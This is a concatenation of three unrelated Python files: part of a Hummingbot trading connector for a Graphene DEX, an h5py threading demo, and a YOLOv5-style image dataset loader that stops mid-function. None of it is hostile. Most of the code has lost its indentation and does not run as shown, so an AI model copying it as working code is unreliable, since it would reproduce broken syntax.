self.dev_log("############### LIMIT ORDER CREATE ATTEMPT ###############")
self.dev_log(trade_type)
self.dev_log(order_type)
self.dev_log(order_id)
self.dev_log(trading_pair)
self.dev_log(amount)
self.dev_log(price)
if self._wif == "":
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
exchange_order_id=order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.OPEN,
)
self._order_tracker.process_order_update(order_update)
return
# get trading rules and normalize price and amount
trading_rule: TradingRule = self._trading_rules[trading_pair]
price = self.quantize_order_price(trading_pair, price)
quantize_amount_price = Decimal("0") if price.is_nan() else price
amount = self.quantize_order_amount(
trading_pair=trading_pair, amount=amount, price=quantize_amount_price
)
# create an inflight order keyed by client order_id
self.start_tracking_order(
order_id=order_id,
exchange_order_id=None,
trading_pair=trading_pair,
trade_type=trade_type,
price=price,
amount=amount,
order_type=order_type,
)
# if the amount is too little disregard the order
# update tracking status to FAILED
if amount < trading_rule.min_order_size:
msg = (
f"{trade_type.name.title()} order amount {amount} is lower than the"
f" minimum order size {trading_rule.min_order_size}. The order will not"
" be created."
)
self.logger().warning(msg)
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.FAILED,
)
self._order_tracker.process_order_update(order_update)
return
# format an order, broadcast to the blockchain
# update tracking status to OPEN
try:
order = json.loads(self._auth.prototype_order(trading_pair))
self.dev_log(order)
self.dev_log(trade_type)
order["edicts"] = [
{
"op": "buy" if trade_type == TradeType.BUY else "sell",
"amount": float(amount),
"price": float(price),
"expiration": 0,
},
]
self.dev_log(order)
await asyncio.sleep(0.01)
result = await self._broker(order)
# ~ {"method": "notice",
# ~ "params": [1, [{
# ~ "id": "9c91cd07aa2844473cc3c6047ec2c4f7ce40c8c1",
# ~ "block_num": 66499124,
# ~ "trx_num": 0,
# ~ "trx": {
# ~ "ref_block_num": 45619,
# ~ "ref_block_prefix": 3851304488,
# ~ "expiration": "2022-02-20T20:12:06",
# ~ "operations": [
# ~ [1, {
# ~ "fee": {
# ~ "amount": 48260,
# ~ "asset_id": "1.3.0"
# ~ },
# ~ "seller": "1.2.743179",
# ~ "amount_to_sell": {
# ~ "amount": 5,
# ~ "asset_id": "1.3.5640"
# ~ },
# ~ "min_to_receive": {
# ~ "amount": 1000000,
# ~ "asset_id": "1.3.0"
# ~ },
# ~ "expiration": "2096-10-02T07:06:40",
# ~ "fill_or_kill": false,
# ~ "extensions": []}],
# ~ [1, {
# ~ "fee": {
# ~ "amount": 48260,
# ~ "asset_id": "1.3.0"
# ~ },
# ~ "seller": "1.2.743179",
# ~ "amount_to_sell": {
# ~ "amount": 1000000,
# ~ "asset_id": "1.3.0"
# ~ },
# ~ "min_to_receive": {
# ~ "amount": 5,
# ~ "asset_id": "1.3.5640"
# ~ },
# ~ "expiration": "2096-10-02T07:06:40",
# ~ "fill_or_kill": false,
# ~ "extensions": []}]],
# ~ "extensions": [],
# ~ "signatures": [
# ~ "1f1fa0acde...d80f8254c6"
# ~ ],
# ~ "operation_results": [
# ~ [1, {"1.7.490017546"],
# ~ [1, {"1.7.490017547" ]]}}]]}
############################################################################
            if isinstance(result, dict) and result.get("status"):
exchange_order_id = result["result"]["params"][1][0]["trx"][
"operation_results"
][0][1]
########################################################################
# update_timestamp = int(result["blocknum"])
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
exchange_order_id=exchange_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.OPEN,
)
self._order_tracker.process_order_update(order_update)
else:
raise ValueError("DEX did not return an order id")
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
# if anything goes wrong log stack trace
# update tracking status to FAILED
except Exception as error:
self.logger().network(
"Error submitting order to Graphene for "
f"{amount} {trading_pair} "
f"{price}.",
exc_info=True,
app_warning_msg=str(error),
)
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.FAILED,
)
self._order_tracker.process_order_update(order_update)
async def _limit_order_cancel(
self,
trading_pair: str,
client_order_id: str,
) -> list: # of exchange_order_id
"""
Requests the DEX to cancel an active order
:param trading_pair: the trading pair the order to cancel operates with
:param client_order_id: the client id of the order to cancel
"""
self.dev_log(f"CANCELLING ORDER #{client_order_id}")
if self._wif == "":
order_update: OrderUpdate = OrderUpdate(
client_order_id=client_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.CANCELLED,
)
self._order_tracker.process_order_update(order_update)
self.dev_log("############# PAPER #############")
self.dev_log("ORDER STATUS UPDATED TO CANCELLED")
self.dev_log("#################################")
return [client_order_id]
# self.dev_log("_limit_order_cancel")
result = None
tracked_order = self._order_tracker.fetch_tracked_order(client_order_id)
# if this order was placed by hummingbot
if tracked_order is not None:
# change its status to pending cancellation
order_update: OrderUpdate = OrderUpdate(
client_order_id=client_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.PENDING_CANCEL,
)
self._order_tracker.process_order_update(order_update)
# attempt to cancel the order
try:
order = json.loads(self._auth.prototype_order(trading_pair))
order["header"]["wif"] = self._wif
order["edicts"] = [
{"op": "cancel", "ids": [tracked_order.exchange_order_id]}
]
result = await self._broker(order)
self.dev_log(f"CANCELLED ORDER #{client_order_id}")
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
msg = (
"There was a an error when requesting cancellation of order "
f"{client_order_id}"
)
self.logger().exception(msg)
raise
################################################################################
# if the result from the cancellation attempt contains the DEX order id
# update the status to CANCELLED
self.dev_log(result["result"])
if (
isinstance(result["result"], list)
and result["result"]
and result["result"][0] == tracked_order.exchange_order_id
):
order_update: OrderUpdate = OrderUpdate(
client_order_id=client_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.CANCELLED,
)
self._order_tracker.process_order_update(order_update)
self.dev_log("ORDER STATUS UPDATED TO CANCELLED")
# otherwise return the order state to open
else:
order_update: OrderUpdate = OrderUpdate(
client_order_id=client_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.OPEN,
)
self.dev_log("ORDER STATUS RETURNED TO OPEN")
self._order_tracker.process_order_update(order_update)
        # return the list of cancellation results (empty if the order was untracked)
        return result["result"] if result else []
################################################################################
async def _status_polling_loop(self):
"""
Performs all required operations to keep the connector synchronized
with the DEX. It also updates the time synchronizer.
Executes when the _poll_notifier event is enabled by the `tick` function.
"""
while True:
try:
self.dev_log("###########STATUS#POLLING#LOOP#OCCOURING##########")
while not self._poll_notifier.is_set():
await asyncio.sleep(1)
self.dev_log("LOOP IS " + str(self._poll_notifier))
# ~ await self._poll_notifier.wait()
self.dev_log("###################NOTIFIER#######################")
await self._update_time_synchronizer()
self.dev_log("###################TIME###########################")
await self._update_balances()
self.dev_log("###################BALANCES:######################")
self.dev_log(self._account_balances)
self._last_poll_timestamp = self.current_timestamp
self.dev_log("###################TIMESTAMP######################")
await asyncio.sleep(1)
self.dev_log("###################END#LOOP#######################")
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
self.logger().network(
"Unexpected error while fetching updates.",
exc_info=True,
app_warning_msg=(
"Could not fetch account updates. "
"Check metanode and network connection."
),
)
finally:
self._poll_notifier = asyncio.Event()
async def _trading_rules_polling_loop(self):
"""
        Updates the trading rules periodically in the background so the
        connector stays synchronized with the DEX.
"""
# self.dev_log("_trading_rules_polling_loop")
while True:
try:
await asyncio.sleep(1)
await self._update_trading_rules()
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
self.logger().network(
"Unexpected error while fetching updates.",
exc_info=True,
app_warning_msg=(
"Could not fetch account updates. "
"Check metanode and network connection."
),
)
async def _update_trading_rules(self):
"""
gather DEX info from metanode.assets and pass on to _trading_rules
"""
# self.dev_log("_update_trading_rules")
try:
graphene_max = self.constants.core.GRAPHENE_MAX
metanode_assets = self.metanode.assets
rules = []
for trading_pair in self.constants.chain.PAIRS:
base, quote = trading_pair.split("-")
base_min = self.constants.core.DECIMAL_SATOSHI
quote_min = self.constants.core.DECIMAL_SATOSHI
supply = self.constants.core.DECIMAL_SATOSHI
try:
base_min = Decimal(2) / 10 ** metanode_assets[base]["precision"]
quote_min = Decimal(2) / 10 ** metanode_assets[quote]["precision"]
supply = Decimal(metanode_assets[base]["supply"])
except Exception:
pass
rules.append(
TradingRule(
trading_pair=trading_pair,
min_order_size=base_min,
max_order_size=supply,
min_price_increment=Decimal(1) / int(graphene_max),
min_base_amount_increment=base_min,
min_quote_amount_increment=quote_min,
min_notional_size=base_min,
min_order_value=quote_min,
max_price_significant_digits=Decimal(graphene_max),
supports_limit_orders=True,
supports_market_orders=False, # OrderType.LIMIT *only*
buy_order_collateral_token=None,
sell_order_collateral_token=None,
)
)
self._trading_rules.clear()
for trading_rule in rules:
self._trading_rules[trading_rule.trading_pair] = trading_rule
except Exception as error:
msg = f"Error updating trading rules: {error.args}"
self.logger().exception(msg)
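    # Worked example of the precision math above (illustrative): an asset with
    # precision 8 yields base_min = Decimal(2) / 10 ** 8 == Decimal("2E-8"),
    # i.e. a minimum order size of two satoshi of that asset.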
async def _user_stream_event_listener(self):
"""
        This function runs in the background, continuously processing the events
received from the DEX by the user stream data source.
It keeps reading events from the queue until the task is interrupted.
The events received are order updates and trade events.
"""
# self.dev_log("_user_stream_event_listener")
async def iter_user_event_queue() -> AsyncIterable[Dict[str, any]]:
"""
fetch events from the user stream
"""
while True:
try:
user_streamer = await self._user_stream_tracker.user_stream.get()
self.dev_log("########################")
self.dev_log(user_streamer)
self.dev_log("########################")
yield user_streamer
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
self.logger().network(
"Unknown error. Retrying after 1 seconds.",
exc_info=True,
app_warning_msg=(
"Could not fetch user events from Graphene."
"Check network connection."
),
)
await asyncio.sleep(1.0)
finally:
await asyncio.sleep(0.1)
async for event_message in iter_user_event_queue():
try:
# localize and type cast values common to all event_messages
trading_pair = str(event_message["trading_pair"])
execution_type = str(event_message["execution_type"])
client_order_id = str(event_message["client_order_id"])
exchange_order_id = str(event_message["exchange_order_id"])
# process trade event messages
if execution_type == "FILL":
tracked_order = self._order_tracker.fetch_order(
client_order_id=client_order_id
)
if tracked_order is not None:
# localize and type cast fill order event message values
trade_id = str(event_message["trade_id"])
fee_asset = str(event_message["fee_asset"])
fee_paid = Decimal(event_message["fee_paid"])
fill_price = Decimal(event_message["price"])
fill_timestamp = int(event_message["fill_timestamp"])
fill_base_amount = Decimal(event_message["fill_base_amount"])
# estimate the quote amount
fill_quote_amount = fill_base_amount * fill_price
# process a trade update
trade_update = TradeUpdate(
client_order_id=client_order_id,
exchange_order_id=exchange_order_id,
trading_pair=trading_pair,
fill_base_amount=fill_base_amount,
fill_quote_amount=fill_quote_amount,
fill_price=fill_price,
trade_id=trade_id,
fee_asset=fee_asset,
fee_paid=fee_paid,
fill_timestamp=fill_timestamp,
)
self._order_tracker.process_trade_update(trade_update)
# all other event messages just change order state
# eg "CANCELLED" or "FILLED"
in_flight_order = self.in_flight_orders.get(client_order_id)
if in_flight_order is not None:
# localize order state event message values
                    update_timestamp = int(event_message["update_timestamp"])
                    new_state = self.constants.ORDER_STATE[
                        event_message["order_state"]
                    ]
# process an order update
order_update = OrderUpdate(
trading_pair=trading_pair,
client_order_id=client_order_id,
exchange_order_id=exchange_order_id,
update_timestamp=update_timestamp,
new_state=new_state,
)
self._order_tracker.process_order_update(order_update=order_update)
await self._update_balances()
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
self.logger().error(
"Unexpected error in user stream listener loop.", exc_info=True
)
await asyncio.sleep(1.0)
async def _update_balances(self):
"""
use metanode.assets 'total' and 'free' to update
self._account_balances
self._account_available_balances
"""
# self.dev_log("Updating Balances")
if self._account_balances == {}:
self._auth.login()
try:
if await self.check_network() == NetworkStatus.NOT_CONNECTED:
for asset in self.constants.chain.ASSETS:
self._account_available_balances[asset] = Decimal(0)
self._account_balances[asset] = Decimal(0)
else:
metanode_assets = self.metanode.assets
for asset in self.constants.chain.ASSETS:
self._account_available_balances[asset] = Decimal(
str(metanode_assets[asset]["balance"]["free"])
)
self._account_balances[asset] = Decimal(
str(metanode_assets[asset]["balance"]["total"])
)
except Exception as error:
for asset in self.constants.chain.ASSETS:
self._account_available_balances[asset] = Decimal(0)
self._account_balances[asset] = Decimal(0)
msg = f"Error updating account balances: {error.args}"
self.logger().exception(msg)
msgs = [
"Available Balances",
self._account_available_balances,
"Total Balances",
self._account_balances,
]
for msg in msgs:
self.dev_log(msg)
async def _update_time_synchronizer(self):
"""
Used to synchronize the local time with the server's time.
This class is useful when timestamp-based signatures
are required by the DEX for authentication.
Upon receiving a timestamped message from the server,
use `update_server_time_offset_with_time_provider`
to synchronize local time with the server's time.
"""
# self.dev_log("_update_time_synchronizer")
if self.constants.hummingbot.SYNCHRONIZE:
synchro = self._time_synchronizer
try:
await synchro.update_server_time_offset_with_time_provider(
time_provider=self.metanode.timing["blocktime"]
)
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
except Exception:
self.logger().exception("Error requesting server time")
raise
|
garbage.py | # This file is part of h5py, a Python interface to the HDF5 library.
#
# http://www.h5py.org
#
# Copyright 2008-2013 Andrew Collette and contributors
#
# License: Standard 3-clause BSD; see "license.txt" for full license terms
# and contributor agreement.
"""
Demonstrates garbage messages printed to stderr for membership
testing, when performed in new threads.
"""
from threading import Thread
import h5py
def demonstrate():
with h5py.File('foo', 'w', driver='core') as f:
print('x' in f)
if __name__ == '__main__':
print("Main thread")
demonstrate()
thread = Thread(target=demonstrate)
print("New thread")
thread.start()
thread.join()
|
yolo_datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils import xyxy2xywh, xywh2xyxy, clean_str
# from yolov5.utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff',
'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv',
'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
    except Exception:
pass
return s
def get_yolo_dataset():
    # Make sure only the first process in DDP processes the dataset first,
    # so the following processes can use the cache
path = '/home/qiyuan/2021summer/imageclef/train.txt'
imgsz = 640
batch_size = 1
augment = False
stride = 32
pad = 0.5
rect = True
rank = -1
cache = False
hyp = None
image_weights = False
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp,
# augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=False,
stride=int(stride),
pad=pad,
rank=rank,
image_weights=image_weights)
return dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler',
_RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
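# A minimal usage sketch of InfiniteDataLoader (illustrative; `dataset` could
# be the LoadImagesAndLabels instance returned by get_yolo_dataset() above):
#   loader = InfiniteDataLoader(dataset, batch_size=1, num_workers=2)
#   for batch in loader:  # workers persist across epochs instead of respawning
#       ...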
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (
self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
            pipe = int(pipe)  # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'stream'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if
len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in
sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(int(s) if s.isnumeric() else s) # numeric string -> local camera index
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print(
'WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x
in img_paths]
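# Example (illustrative): img2label_paths(['coco/images/train/0001.jpg'])
# -> ['coco/labels/train/0001.txt'] (only the first /images/ component is swapped)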
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False,
hyp=None, rect=False, image_weights=False, cache_images=False,
single_cls=False, stride=32, pad=0.0, rank=-1):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [
x.replace('./', parent) if x.startswith('./') else x
for x in t] # local to global path
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted([x.replace('/', os.sep) for x in f if
x.split('.')[-1].lower() in img_formats])
assert self.img_files, 'No images found'
except Exception as e:
raise Exception(
'Error loading data from %s: %s\nSee %s' % (path, e, help_url))
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = Path(self.label_files[0]).parent.with_suffix('.cache') # cached labels
if cache_path.is_file():
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'results' not in cache: # changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
desc = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=desc, total=n, initial=n)
assert nf > 0 or not augment, f'No labels found in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(int) # batch index (np.int is deprecated in NumPy >= 1.20)
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(4).imap(lambda x: load_image(*x),
zip(repeat(self),
range(n))) # 4 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path=Path('./labels.cache')):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, corrupted
pbar = tqdm(zip(self.img_files, self.label_files),
desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = np.array(
[x.split() for x in f.read().strip().splitlines()],
dtype=np.float32) # labels
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape]
except Exception as e:
nc += 1
print(
'WARNING: Ignoring corrupted image and/or label %s: %s' % (
im_file, e))
pbar.desc = f"Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = [nf, nm, ne, nc, i + 1]
torch.save(x, path) # save for next time
logging.info(f"New cache created: {path}")
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False,
scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'],
vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
